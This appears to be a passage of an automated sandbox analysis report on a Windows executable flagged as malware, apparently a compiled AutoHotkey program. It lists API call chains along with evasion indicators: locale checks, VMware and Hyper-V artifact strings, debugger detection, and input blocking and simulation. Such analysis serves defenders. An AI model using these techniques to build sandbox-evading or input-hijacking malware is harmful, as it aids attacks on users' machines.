Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097CA0 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,0_2_0000000140097CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091D8D GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091D8D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091D9D MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091D9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091D95 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091D95
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091DAB MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091DAB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097DCF ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097DCF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097DC5 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097DC5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091DEF MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091DEF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097DFA ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097DFA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097E2C ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097E2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091E27 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091E27
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140091E36 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,0_2_0000000140091E36
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097E8A ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097E8A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140093EF0 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetClientRect,MulDiv,MulDiv,_wcstoi64,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,0_2_0000000140093EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097EE8 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097EE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097F19 MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,0_2_0000000140097F19
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008FF50 SendMessageW,MulDiv,MulDiv,free,free,free,free,free,free,free,free,free,free,free,free,COMRefPtr,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,MapWindowPoints,0_2_000000014008FF50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140018F600_2_0000000140018F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeWindow / User API: foregroundWindowGot 826Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeAPI coverage: 1.4 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140018F600_2_0000000140018F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014001A970 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 000000014001AAEDh country: Russian (ru)0_2_000000014001A970
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400229E7 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)0_2_00000001400229E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400229E7 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)0_2_00000001400229E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400229EF GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)0_2_00000001400229EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400229EF GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)0_2_00000001400229EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400229F6 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)0_2_00000001400229F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400229F6 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)0_2_00000001400229F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140022A1D GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)0_2_0000000140022A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140022A1D GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)0_2_0000000140022A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140022A41 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)0_2_0000000140022A41
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140022A41 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)0_2_0000000140022A41
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140022A65 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 0000000140022C1Ah country: Urdu (ur)0_2_0000000140022A65
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140022A65 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 0000000140022C1Ah country: Inuktitut (iu)0_2_0000000140022A65
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140015020 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140015382h country: Spanish (es)0_2_0000000140015020
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140059470 GetLocalTime followed by cmp: cmp word ptr [rbx], cx and CTI: je 00000001400597A3h0_2_0000000140059470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140059470 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140059663h0_2_0000000140059470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AE260 FindFirstFileW,FindClose,FindFirstFileW,FindClose,0_2_00000001400AE260
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AE160 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00000001400AE160
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003C8E0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,0_2_000000014003C8E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140066F50 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_0000000140066F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400672B0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,free,malloc,0_2_00000001400672B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081660 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,0_2_0000000140081660
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140067900 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,0_2_0000000140067900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081C50 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0000000140081C50
Source: Amcache.hve.0.drBinary or memory string: VMware
Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.0000000000978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328940342.0000000003027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:F[
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.000000000093F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@n
Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.drBinary or memory string: vmci.sys
Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.drBinary or memory string: VMware20,1
Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeAPI call chain: ExitProcess graph end nodegraph_0-243874
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140018080 BlockInput,free,BlockInput,0_2_0000000140018080
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400CEB14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001400CEB14
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B4300 LoadLibraryW,GetProcAddress,0_2_00000001400B4300
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D8678 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,0_2_00000001400D8678
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400CEB14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001400CEB14
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D37C4 SetUnhandledExceptionFilter,0_2_00000001400D37C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D1920 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00000001400D1920
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140041B60 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,0_2_0000000140041B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400172D0 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,0_2_00000001400172D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140018AE0 mouse_event,0_2_0000000140018AE0
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: Program Manager
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3327786647.00000000007FC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Progman
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: TextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAllClipboard...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersLabelTypeCountLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPFuncRemoveClipboardFormatListeneruser32AddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMeRegClassAutoHotkey2Shell_TrayWndCreateWindoweditConsolasLucida Console*ErrorLevel <>=/|^,:*&~!()[]{}+-?."'\;`IFWHILEClass>AUTOHOTKEY SCRIPT<Could not extract script from EXE./*#CommentFlag*/and<>=/|^,:<>=/|^,:.+-*&!?~::?*- Continuation section too long.JoinLTrimRTrimMissing ")"Functions cannot contain functions.Missing "{"Not a valid method, class or property definition.GetSetNot a valid property getter/setter.Hotkeys/hotstrin
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D4120 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00000001400D4120
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400693D0 GetComputerNameW,GetUserNameW,0_2_00000001400693D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400CF0C4 HeapCreate,GetVersion,HeapSetInformation,0_2_00000001400CF0C4
Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: WIN_XP
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfop6
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: WIN_VISTA
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: WIN_7
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: WIN_8
